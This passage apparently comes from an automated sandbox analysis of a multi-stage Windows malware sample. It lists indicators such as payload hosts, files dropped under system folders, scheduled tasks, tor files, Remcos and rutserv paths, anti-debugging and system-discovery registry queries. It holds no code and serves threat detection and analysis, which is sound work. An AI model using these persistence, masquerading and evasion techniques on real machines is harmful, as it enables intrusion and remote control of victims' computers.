| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | freegeoip.app | N/A | N/A |
| N/A | freegeoip.app | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Obfuscated Files or Information: Command Obfuscation
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\SysWOW64\ruts\ssleay32.dll | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\ruts | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\devtun\RuntimeBroker.exe | C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\MicrosoftProfile | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs | C:\Windows\System32\dllhost.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\unverified-microdesc-consensus.tmp | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus.tmp | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\11.reg | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\rutserv.exe | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Tasks\boleto | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\state.tmp | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs.tmp | C:\Windows\system32\lsass.exe | N/A |
| File opened for modification | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdescs.new | C:\Windows\system32\lsass.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\xda | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\lock | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\rfusclient.exe | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\libeay32.dll | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\rutssvc64 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\devtun\RuntimeBroker.exe | C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus | C:\Windows\System32\dllhost.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
Suspicious use of SetThreadContext
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
| File created | C:\Windows\Installer\e5a7e3a.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e5a7e3a.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
Access Token Manipulation: Create Process with Token
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Installer Packages
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\daytjhasdawd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\50to.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Remcos\remcos.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\50.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-O26NE.tmp\jy.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WerFault.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key security queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
